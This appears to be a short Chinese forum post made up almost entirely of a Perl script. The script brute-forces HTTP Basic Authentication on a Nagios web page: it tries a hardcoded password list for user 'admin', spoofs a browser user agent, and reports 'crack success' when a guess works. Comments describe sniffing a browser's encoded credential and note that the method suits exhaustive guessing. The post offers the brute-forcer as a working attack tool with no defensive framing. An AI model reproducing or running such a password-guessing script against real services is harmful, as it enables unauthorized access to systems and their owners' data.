Perl脚本Basic Authentication方法
Perl脚本Basic Authentication方法[*]#!/usr/bin/perl
[*]
[*]use strict;
[*]use warnings;
[*]use HTTP::Request;
[*]use LWP::UserAgent;
[*]use Data::Dumper;
[*]use Getopt::Std;
[*]
[*]my %options = ();
[*]getopt("d:",\%options);
[*]
[*]my $debug = $options{d} || 0;
[*]
[*]my @password_array = qw(ken jack sunny ben kick);
[*]
[*]&main(@password_array);
[*]
[*]
[*]
[*]sub main {
[*] foreach my $password (@_) {
[*] my $status = &get_url($password);
[*] if ($status == 1) {
[*] last;
[*] }
[*] }
[*]}
[*]
[*]
[*]sub get_url {
[*] my $password = shift;
[*]
[*] my $ua;
[*] my $req;
[*] my $res;
[*]
[*] my $url = 'http://192.168.4.40:8010/nagios';
[*]
[*] $ua = LWP::UserAgent->new;
[*] $ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070309 Firefox/2.0.0.3');
[*] $ua->timeout(5);
[*]
[*] $req = HTTP::Request->new( GET => $url );
[*] #方法1:使用Firefox登陆这个Url输入用户密码时抓包,将密文抓下来。贴在下面
[*] #$req->header("Authorization" => 'Basic bW9ua3R4cep1Y3dlYl9tb25pdG9y');
[*] #方法2:可以直接输入用户名和密码,适合进行穷举时使用
[*] $req->authorization_basic('admin', $password);
[*]
[*] $res = $ua->request($req);
[*] print "************************** content begin **************************\n" if $debug;
[*] print $res->content . "\n" if $debug;
[*] print "************************** content end **************************\n" if $debug;
[*]
[*] print '*************************** Dumper $res ***************************' . "\n" if $debug;
[*] print Dumper $res if $debug;
[*] print '*************************** Dumper $res ***************************' . "\n" if $debug;
[*]
[*] if ($res->is_success) {
[*] print "crack success,password: " . $password . "\n";
[*] return 1;
[*] } else {
[*] print "crack fail,password: " . $password . "\n";
[*] return 0;
[*] }
[*]}
页:
[1]